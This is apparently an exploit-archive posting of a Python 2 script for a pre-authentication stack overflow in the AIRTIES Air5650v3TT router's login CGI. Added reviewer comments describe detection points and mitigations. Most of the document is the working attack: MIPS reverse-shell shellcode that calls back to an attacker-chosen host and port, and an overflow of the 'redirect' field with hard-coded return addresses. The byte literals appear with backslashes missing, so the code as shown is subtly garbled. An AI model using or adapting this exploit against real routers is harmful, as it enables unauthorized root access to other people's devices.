
Airties Air5650v3TT Remote Stack Overflow

Posted on 04 April 2015

#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################
#
# Reviewer notes (defensive reading of this listing):
#   * The script sends exactly one HTTP POST to /cgi-bin/login on the device's
#     web interface. No session or earlier request is made, so the flaw looks
#     reachable before authentication -- confirm against a vendor advisory.
#   * The oversized value travels in the `redirect` form field. A login request
#     whose `redirect` field is hundreds of bytes long and is not a plausible
#     URL is the obvious thing to alert on or drop at a proxy/WAF in front of
#     the management interface.
#   * Per the header above, success means the device opens an outbound
#     connection to a host chosen by the sender; unexpected outbound sessions
#     from a CPE/router are a second detection point.
#   * Exposure is reduced by keeping the management web UI unreachable from
#     untrusted networks and by running current vendor firmware (the page does
#     not name a fixed version).
#   * Python 2 only: `print` statement, urllib2/httplib, string.atoi.
#   * All string literals below are reproduced character-for-character from
#     the page as rendered.
import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib

if __name__ == '__main__':

    # Positional arguments: device address, callback address, callback port.
    try:
        ip = sys.argv[1]
        revhost = sys.argv[2]
        revport = sys.argv[3]
    except:
        # NOTE(review): the bare except only prints the usage line and then
        # falls through, so a missing argument surfaces as a NameError on the
        # next statement rather than a clean exit.
        print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]

    # Dotted-quad callback address -> 32-bit big-endian integer; port -> int.
    host = struct.unpack('>L',socket.inet_aton(revhost))[0]
    port = string.atoi(revport)

    # Payload string, built from fixed literals with the callback port and
    # address spliced in as individual characters. The header comment says the
    # result is a reverse root shell; nothing in this listing documents the
    # individual instructions.
    shellcode = ""
    shellcode += "x24x0fxffxfax01xe0x78x27x21xe4xffxfdx21xe5xffxfd"
    shellcode += "x28x06xffxffx24x02x10x57x01x01x01x0cxafxa2xffxff"
    shellcode += "x8fxa4xffxffx34x0fxffxfdx01xe0x78x27xafxafxffxe0"
    # The two big-endian port characters are inserted twice.
    shellcode += "x3cx0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
    shellcode += "x35xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
    shellcode += "xafxaexffxe4"
    # The four big-endian address characters are inserted as two halves.
    shellcode += "x3cx0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
    shellcode += "x35xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
    shellcode += "xafxaexffxe6x27xa5xffxe2x24x0cxffxefx01x80x30x27"
    shellcode += "x24x02x10x4ax01x01x01x0cx24x11xffxfdx02x20x88x27"
    shellcode += "x8fxa4xffxffx02x20x28x21x24x02x0fxdfx01x01x01x0c"
    shellcode += "x24x10xffxffx22x31xffxffx16x30xffxfax28x06xffxff"
    shellcode += "x3cx0fx2fx2fx35xefx62x69xafxafxffxecx3cx0ex6ex2f"
    shellcode += "x35xcex73x68xafxaexffxf0xafxa0xffxf4x27xa4xffxec"
    shellcode += "xafxa4xffxf8xafxa0xffxfcx27xa5xffxf8x24x02x0fxab"
    shellcode += "x01x01x01x0c"

    # Value for the `redirect` field: runs of filler separated by five fixed
    # constants, then the payload string, then one constant repeated 48 times.
    # The page does not say what the constants refer to; presumably they are
    # tied to one specific firmware build -- unverified.
    data = "x41"*359 + "x2AxB1x19x18" + "x41"*40 + "x2AxB1x44x40"
    data += "x41"*12 + "x2AxB0xFCxD4" + "x41"*16 + "x2AxB0x7Ax2C"
    data += "x41"*28 + "x2AxB0x30xDC" + "x41"*240 + shellcode + "x27xE0xFFxFF"*48

    # Login form fields. Only `redirect` carries the oversized value; the
    # remaining fields are short fixed strings.
    pdata = {
        'redirect'  : data,
        'self'      : '1',
        'user'      : 'tanri',
        'password'  : 'ihtiyacmyok',
        'gonder'    : 'TAMAM'
    }

    # URL-encode the form body (this is what would appear in request logs).
    login_data = urllib.urlencode(pdata)
    #print login_data

    # Plain-HTTP POST to the device's login CGI; no extra headers are set and
    # the response object is never read.
    url = 'http://%s/cgi-bin/login' % ip
    header = {}
    req = urllib2.Request(url, login_data, header)
    rsp = urllib2.urlopen(req)

 
